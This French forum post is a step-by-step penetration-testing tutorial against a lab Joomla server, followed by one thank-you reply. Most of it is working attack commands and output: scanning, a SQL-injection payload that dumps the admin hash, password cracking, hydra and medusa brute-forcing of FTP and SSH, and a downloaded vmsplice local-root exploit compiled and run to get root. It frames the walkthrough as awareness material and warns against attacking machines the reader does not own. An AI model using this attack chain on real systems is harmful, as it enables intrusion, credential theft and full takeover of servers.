Annonce

Réduire
Aucune annonce.

Tester le sécuritée d'un serveur

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Tester le sécuritée d'un serveur

    Nous allons commencer par utiliser quelques outils pour collecter des infos sur le server.
    que l'on cible ::



    - httprint
    - dimitry http://wiki.backtrack-fr.net/index.php/DMitry
    - nmap http://wiki.backtrack-fr.net/index.php/Nmap
    - amap http://wiki.backtrack-fr.net/index.php/Amap

    Code:
    Code:
    
    bt linux # httprint -h 192.168.1.44 -s signatures.txt
    httprint v0.301 (beta) - web server fingerprinting tool
    (c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
    http://net-square.com/httprint/
    [email protected]
    
    Finger Printing on http://192.168.1.44:80/
    Finger Printing Completed on http://192.168.1.44:80/
    --------------------------------------------------
    Host: 192.168.1.44
    Derived Signature:
    Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
    811C9DC568D17AAE811C9DC5811C9DC5811C9DC5505FCFE84276E4BB630A04DB
    0D7645B5811C9DC5811C9DC5CD37187C811C9DC5811C9DC5811C9DC5811C9DC5
    68D17AAE68D17AAE68D17AAE811C9DC5E2CE6927050C5D3368D17AAE9E431BC8
    6ED3C29568D17AAE2A200B4C68D17AAE68D17AAE68D17AAE68D17AAEE2CE6923
    E2CE692368D17AAE811C9DC5E2CE6927E2CE6923
    
    Banner Reported: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
    Banner Deduced: Lotus-Domino/6.x
    Score: 92
    Confidence: 55.42
    ------------------------

    Code:
    Code:
    
    bt ~ # dmitry -p -b 192.168.1.44
    Deepmagic Information Gathering Tool
    "There be some deep magic going on"
    
    HostIP:192.168.1.44
    HostName:joomla12
    
    Gathered TCP Port information for 192.168.1.44
    ---------------------------------
    
    Port State
    21/tcp open
    >> 220 Welc0m3 To The SUp3r S3cuRe's Ftp S3rVer
    22/tcp open
    >> SSH-2.0-OpenSSH_4.3p2 Debian-9
    80/tcp open
    .....

    Code:
    Code:
    
    bt bin # amap -bvq 192.168.1.44 80
    Using trigger file /usr/local/etc/appdefs.trig ... loaded 30 triggers
    Using response file /usr/local/etc/appdefs.resp ... loaded 346 responses
    Using trigger file /usr/local/etc/appdefs.rpc ... loaded 450 triggers
    
    amap v5.2 (www.thc.org/thc-amap) started at 2008-09-15 17:35:02 - MAPPING mode
    
    Total amount of tasks to perform in plain connect mode: 23
    Waiting for timeout on 23 connections ...
    Protocol on 192.168.1.44:80/tcp (by trigger http) matches http - banner: HTTP/1.1 302 Found\r\nDate Mon, 15 Sep 2008 172821 GMT\r\nServer Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8\r\nLocation http//127.0.1.1/apache2-default/\r\nContent-Length 368\r\nConnection close\r\n
    ....
    amap v5.2 finished at 2008-09-15 17:35:11
    Code:
    Code:
    
    bt ~ # nmap -sSV -P0 192.168.1.44
    
    Starting Nmap 4.50 ( http://insecure.org ) at 2008-09-15 17:44 CEST
    Interesting ports on joomla12 (192.168.1.44):
    Not shown: 1706 closed ports
    PORT STATE SERVICE VERSION
    21/tcp open ftp vsftpd or WU-FTPD
    22/tcp open ssh OpenSSH 4.3p2 Debian 9 (protocol 2.0)
    80/tcp open http Apache httpd 2.2.3 ((Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.Cool
    111/tcp open rpcbind 2 (rpc #100000)
    113/tcp open ident OpenBSD identd
    MAC Address: 00:02:A5:23:CE:94 (Compaq Com****r)
    Service Info: OSs: Linux, OpenBSD

    Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 6.378 seconds

    Suite à cette collecte d'information nous constatons que nous avons un Server web Apache 2.2.3, sur une machine debian etch, avec un service ftp VSFTPD ou WU-ftpd et un service ssh openSSH.

    Nous allons donc maintenant tester le site web tournant sur cette machine avec nikto.

    - nikto http://wiki.backtrack-fr.net/index.php/Nikto
    Code:
    Code:
    
    bt nikto # ./nikto.pl -e 1 -host http://192.168.1.44/joomla12 -F txt -o nickojoom.txt
    ---------------------------------------------------------------------------
    - Nikto 2.01/2.01 - cirt.net
    + Target IP: 192.168.1.44
    + Target Hostname: joomla12
    + Target Port: 80
    + Using IDS Evasion: Random URI encoding (non-UTF8)
    + Start Time: 2008-09-16 10:26:17
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    - Root page / redirects to: http://joomla12/apache2-default/
    - Retrieved X-Powered-By header: PHP/5.2.0-8+etch10
    + /robots.txt - contains 13 'disallow' entries which should be manually viewed (added to mutation file lists) (GET).
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
    + OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
    + PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
    + Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.6). Apache 1.3.39 and 2.0.61 are also current.
    + mod_python/3.2.10 appears to be outdated (current is at least 3.3.1)
    + PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
    + mod_perl/2.0.2 appears to be outdated (current is at least 5.8.0)
    + OSVDB-0: GET /joomla12/help/ : Help directory should not be accessible
    + OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
    + OSVDB-8193: GET /joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc : EW FileManager for PostNuke allows arbitrary file retrieval.
    + OSVDB-12184: GET /joomla12/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
    + OSVDB-3092: GET /joomla12/administrator/ : This might be interesting...
    + OSVDB-3092: GET /joomla12/includes/ : This might be interesting...
    + OSVDB-3093: GET /joomla12/index.php?base=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
    + OSVDB-3093: GET /joomla12/index.php?IDAdmin=test : This might be interesting... has been seen in web logs from an unknown scanner.
    + OSVDB-3093: GET /joomla12/index.php?pymembs=admin : This might be interesting... has been seen in web logs from an unknown scanner.
    + OSVDB-3093: GET /joomla12/index.php?SqlQuery=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
    + OSVDB-3093: GET /joomla12/index.php?tampon=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
    + OSVDB-3093: GET /joomla12/index.php?topic=<script>alert(document
    + OSVDB-3761: GET /joomla12/?pattern=/etc/*&sort=name : The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.
    + 2963 items checked: 22 item(s) reported on remote host
    + End Time: 2008-09-16 10:27:08 (51 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested

    Le rapport nous informe qu'il pourrait y avoir des vulnérabilité. A nous de les tester et de les découvrir :P
    Code:

    + OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.

    On va commencer par cela et en surfant sur le site on découvre le nom du composant joomla qui est MyAlbum
    (hxxp://192.168.1.44/joomla12/index.php?option=com_myalbum&Itemid=26)

    Une petite recherche sur milw0rm nous permettra de trouver un exploit s'il existe.

    Code:

    bt Desktop # ./milwormsearch.sh Joomla myalbum
    ************************************************
    * Explorateur d'exploit sur Milw0rm *
    * by s3th *
    ************************************************

    exploit: Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability
    Link : http://www.milw0rm.com/exploits/5318
    Voulez-vous afficher l'exploit dans firefox (F) ou à l'écran (E) ou quitter (Q) :
    e
    <html><head><title>Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability</title></head><pre>-------------------------------------------------------------------------------------------------
    # Title : Joomla Component MyAlbum SQL Injection Vulnerability
    # Author : parad0x
    # D.Page : http://joomlacode.org/gf/project/myalbum/
    -------------------------------------------------------------------------------------------------
    http://[target]/index.php?option=com_myalbum&amp;album=[SQL]

    -------------------------------------------------------------------------------------------------
    Example:

    http://www.akparti.org.tr/disiliskil...%20jos_users/*


    -------------------------------------------------------------------------------------------------
    greetz : VoLqaN
    -------------------------------------------------------------------------------------------------
    http://inso.spam-site.www

    # milw0rm.com [2008-03-28]</pre></html>

    Nous allons donc tester cette injection sur notre site : -1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

    Code:

    http://192.168.1.44/joomla12/index.p...%20jos_users/*

    et décvouvrir le pass admin qui est un MD5

    admin e10adc3949ba59abbe56e057f20f883e

    Nous allons voir pourquoi il est important de bien choisir son mot de passe, car si le mot est trop faible il sera cassé par un soft comme johntheripper ou alors il existera dans une base de crack en ligne.

    - johntheripper http://wiki.backtrack-fr.net/index.php/John_The_Ripper

    Code:

    bt Desktop # ./md5crack.sh e10adc3949ba59abbe56e057f20f883e
    ************************************************
    * MD5crack online *
    * by s3th *
    ************************************************

    Plain text: 123456

    Maintenant que nous avons la possiblité de nous logguer en tant qu'admin sur le site, il ne nous reste plus qu'à uploader un script qui nous permette de lancer des commande shell ou une Backdoor et rechercher des infos intéressantes sur le server..

    cat /etc/passwd

    Code:

    s3th:x:1000:1000:s3th,,,:/home/s3th:/bin/bash
    mysql:x:109:114:MySQL Server,,,:/var/lib/mysql:/bin/false
    ftp:x:110:65534::/home/ftp:/bin/false
    ftpuser:x:1001:1001::/home/ftpuser:/bin/bash
    sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
    snort:x:112:115:Snort IDS:/var/log/snort:/bin/false

    uname -a

    Code:

    Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux

    Maintenant que nous avons un user "s3th" on va pouvoir faire une attaque sur le ftp ou le ssh avec :

    - hydra http://wiki.backtrack-fr.net/index.php/Hydra/Hydra-gtk
    - medusa

    Code:

    bt Desktop # hydra -l s3th -P ../arbeit/dict 192.168.1.44 ftp
    Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra (http://www.thc.org) starting at 2008-09-17 11:21:39
    [DATA] 16 tasks, 1 servers, 30206 login tries (l:1/p:30206), ~1887 tries per task
    [DATA] attacking service ftp on port 21
    [21][ftp] host: 192.168.1.44 login: s3th password: 123456
    [STATUS] attack finished for 192.168.1.44 (waiting for childs to finish)
    [21][ftp] host: 192.168.1.44 login: s3th password: 123456
    Hydra (http://www.thc.org) finished at 2008-09-17 11:21:46

    Code:
    Code:
    
    bt Desktop # medusa -h 192.168.1.44 -u s3th -P ../arbeit/dict -M ssh
    Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>
    
    ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 1234 (1/30206)
    ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 123456 (2/30206)
    ACCOUNT FOUND: [ssh] Host: 192.168.1.44 User: s3th Password: 123456 [SUCCESS]
    
    maintenant qu'on a un compte et un pass SSH, il ne nous reste plus qu'à nous logguer:
    Code:
    
    bt ~ # ssh [email protected]
    [email protected]'s password:
    Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    You have new mail.
    Last login: Mon Sep 15 11:28:45 2008

    voila il ne nous reste plus qu'à trouver un pti sploit

    Code:
    Code:
    
    [email protected]:~$ whoami
    s3th
    [email protected]:~$ cd /tmp/
    [email protected]:/tmp$ wget 192.168.1.39/vmsplice-local-root-exploit.c
    --13:21:50-- http://192.168.1.39/vmsplice-local-root-exploit.c
    => `vmsplice-local-root-exploit.c'
    Connexion vers 192.168.1.39:80...connecté.
    requête HTTP transmise, en attente de la réponse...200 OK
    Longueur: 6'293 (6.1K) [text/x-c]
    
    100%[=============================================================================================>] 6'293 --.--K/s
    
    13:22:42 (198.77 KB/s) - « vmsplice-local-root-exploit.c » sauvegardé [6293/6293]
    
    [email protected]:/tmp$ gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
    [email protected]:/tmp$ ./vmsplice-local-root-exploit
    -----------------------------------
    Linux vmsplice Local Root Exploit
    By qaaz
    -----------------------------------
    [+] mmap: 0x0 .. 0x1000
    [+] page: 0x0
    [+] page: 0x20
    [+] mmap: 0x4000 .. 0x5000
    [+] page: 0x4000
    [+] page: 0x4020
    [+] mmap: 0x1000 .. 0x2000
    [+] page: 0x1000
    [+] mmap: 0xb7e32000 .. 0xb7e64000
    [+] root
    [email protected]:/tmp# whoami
    root
    Ce tuto n'a pour but que d'informer qu'un système mal configuré est vulnérable .
    N'essayez pas ces techniques sur des machines ne vous appartenant pas.
    Tout ce que vous faites sera loggé sur la machine.

    src:bt-fr.net
    mactux †|

    Le savoir n'est réel que s'il est partagé

  • #2
    Très bon tutoriel merci à toi .

    Commentaire

    Chargement...
    X